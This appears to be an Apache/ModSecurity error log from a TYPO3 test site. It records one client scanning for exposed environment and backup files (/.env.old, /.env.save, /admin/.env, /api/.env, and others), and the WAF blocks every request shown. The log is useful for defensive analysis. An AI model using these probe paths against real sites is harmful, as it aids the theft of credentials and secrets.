[Sat Nov 22 00:05:21.353557 2025] [:error] [pid 243344] [client 3.9.175.83:37916] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aSDwMRprncRmilB7cHSokQAAAAg"]
[Sat Nov 22 00:05:21.353729 2025] [:error] [pid 243344] [client 3.9.175.83:37916] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aSDwMRprncRmilB7cHSokQAAAAg"]
[Sat Nov 22 00:05:21.467782 2025] [authz_core:error] [pid 243342] [client 3.9.175.83:37880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Sat Nov 22 00:05:21.490664 2025] [:error] [pid 243340] [client 3.9.175.83:37892] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSDwMZeLEhOLAInnw0NqewAAAAA"]
[Sat Nov 22 00:05:21.490827 2025] [:error] [pid 243340] [client 3.9.175.83:37892] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSDwMZeLEhOLAInnw0NqewAAAAA"]
[Sat Nov 22 00:05:21.491051 2025] [:error] [pid 243340] [client 3.9.175.83:37892] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSDwMZeLEhOLAInnw0NqewAAAAA"]
[Sat Nov 22 00:05:21.491276 2025] [:error] [pid 243340] [client 3.9.175.83:37892] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSDwMZeLEhOLAInnw0NqewAAAAA"]
[Sat Nov 22 00:05:21.757239 2025] [:error] [pid 243390] [client 3.9.175.83:38114] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aSDwMbuOi_dqsgv2AxsAVgAAAAM"]
[Sat Nov 22 00:05:21.757460 2025] [:error] [pid 243390] [client 3.9.175.83:38114] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aSDwMbuOi_dqsgv2AxsAVgAAAAM"]
[Sat Nov 22 00:05:21.757642 2025] [:error] [pid 243390] [client 3.9.175.83:38114] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aSDwMbuOi_dqsgv2AxsAVgAAAAM"]
[Sat Nov 22 00:05:22.129973 2025] [:error] [pid 243341] [client 3.9.175.83:38194] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSDwMgqyqiDG5tICQX6noAAAAAE"]
[Sat Nov 22 00:05:22.130196 2025] [:error] [pid 243341] [client 3.9.175.83:38194] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSDwMgqyqiDG5tICQX6noAAAAAE"]
[Sat Nov 22 00:05:22.130423 2025] [:error] [pid 243341] [client 3.9.175.83:38194] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSDwMgqyqiDG5tICQX6noAAAAAE"]
[Sat Nov 22 00:05:22.130595 2025] [:error] [pid 243341] [client 3.9.175.83:38194] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSDwMgqyqiDG5tICQX6noAAAAAE"]
[Sat Nov 22 00:05:26.309403 2025] [authz_core:error] [pid 243343] [client 3.9.175.83:40090] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.swp
[Sat Nov 22 00:05:26.374856 2025] [:error] [pid 243344] [client 3.9.175.83:40012] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSDwNhprncRmilB7cHSokgAAAAg"]
[Sat Nov 22 00:05:26.375179 2025] [:error] [pid 243344] [client 3.9.175.83:40012] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSDwNhprncRmilB7cHSokgAAAAg"]
[Sat Nov 22 00:05:26.376163 2025] [:error] [pid 243344] [client 3.9.175.83:40012] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSDwNhprncRmilB7cHSokgAAAAg"]
[Sat Nov 22 00:05:26.414486 2025] [authz_core:error] [pid 243340] [client 3.9.175.83:40014] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sat Nov 22 00:05:26.532594 2025] [:error] [pid 243342] [client 3.9.175.83:40070] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aSDwNibqTrlsHApMKqWIigAAAAI"]
[Sat Nov 22 00:05:26.532801 2025] [:error] [pid 243342] [client 3.9.175.83:40070] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aSDwNibqTrlsHApMKqWIigAAAAI"]
[Sat Nov 22 00:05:26.532973 2025] [:error] [pid 243342] [client 3.9.175.83:40070] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aSDwNibqTrlsHApMKqWIigAAAAI"]
[Sat Nov 22 00:05:26.773642 2025] [:error] [pid 243390] [client 3.9.175.83:40296] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aSDwNruOi_dqsgv2AxsAVwAAAAM"]
[Sat Nov 22 00:05:26.773862 2025] [:error] [pid 243390] [client 3.9.175.83:40296] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aSDwNruOi_dqsgv2AxsAVwAAAAM"]
[Sat Nov 22 00:05:26.774043 2025] [:error] [pid 243390] [client 3.9.175.83:40296] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aSDwNruOi_dqsgv2AxsAVwAAAAM"]
[Sat Nov 22 00:05:31.049959 2025] [authz_core:error] [pid 243343] [client 3.9.175.83:42430] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Sat Nov 22 00:05:31.139237 2025] [:error] [pid 243340] [client 3.9.175.83:42498] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSDwO5eLEhOLAInnw0NqfQAAAAA"]
[Sat Nov 22 00:05:31.139456 2025] [:error] [pid 243340] [client 3.9.175.83:42498] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSDwO5eLEhOLAInnw0NqfQAAAAA"]
[Sat Nov 22 00:05:31.139643 2025] [:error] [pid 243340] [client 3.9.175.83:42498] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSDwO5eLEhOLAInnw0NqfQAAAAA"]
[Sat Nov 22 00:05:31.186218 2025] [:error] [pid 243344] [client 3.9.175.83:42486] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSDwOxprncRmilB7cHSokwAAAAg"]
[Sat Nov 22 00:05:31.186410 2025] [:error] [pid 243344] [client 3.9.175.83:42486] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSDwOxprncRmilB7cHSokwAAAAg"]
[Sat Nov 22 00:05:31.186644 2025] [:error] [pid 243344] [client 3.9.175.83:42486] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSDwOxprncRmilB7cHSokwAAAAg"]
[Sat Nov 22 00:05:31.186848 2025] [:error] [pid 243344] [client 3.9.175.83:42486] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.old"] [unique_id "aSDwOxprncRmilB7cHSokwAAAAg"]
[Sat Nov 22 00:05:31.229889 2025] [authz_core:error] [pid 243341] [client 3.9.175.83:42462] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Sat Nov 22 00:05:31.436735 2025] [:error] [pid 243342] [client 3.9.175.83:42588] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aSDwOybqTrlsHApMKqWIiwAAAAI"]
[Sat Nov 22 00:05:31.436974 2025] [:error] [pid 243342] [client 3.9.175.83:42588] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aSDwOybqTrlsHApMKqWIiwAAAAI"]
[Sat Nov 22 00:05:31.438591 2025] [:error] [pid 243342] [client 3.9.175.83:42588] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.save"] [unique_id "aSDwOybqTrlsHApMKqWIiwAAAAI"]
[Sat Nov 22 00:05:31.515628 2025] [:error] [pid 243390] [client 3.9.175.83:42704] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aSDwO7uOi_dqsgv2AxsAWAAAAAM"]
[Sat Nov 22 00:05:31.515938 2025] [:error] [pid 243390] [client 3.9.175.83:42704] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aSDwO7uOi_dqsgv2AxsAWAAAAAM"]
[Sat Nov 22 00:05:31.516153 2025] [:error] [pid 243390] [client 3.9.175.83:42704] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.save"] [unique_id "aSDwO7uOi_dqsgv2AxsAWAAAAAM"]
[Sat Nov 22 00:05:31.811849 2025] [:error] [pid 243343] [client 3.9.175.83:42800] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSDwO4NKGNllPFPT2VHklwAAAAY"]
[Sat Nov 22 00:05:31.812063 2025] [:error] [pid 243343] [client 3.9.175.83:42800] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSDwO4NKGNllPFPT2VHklwAAAAY"]
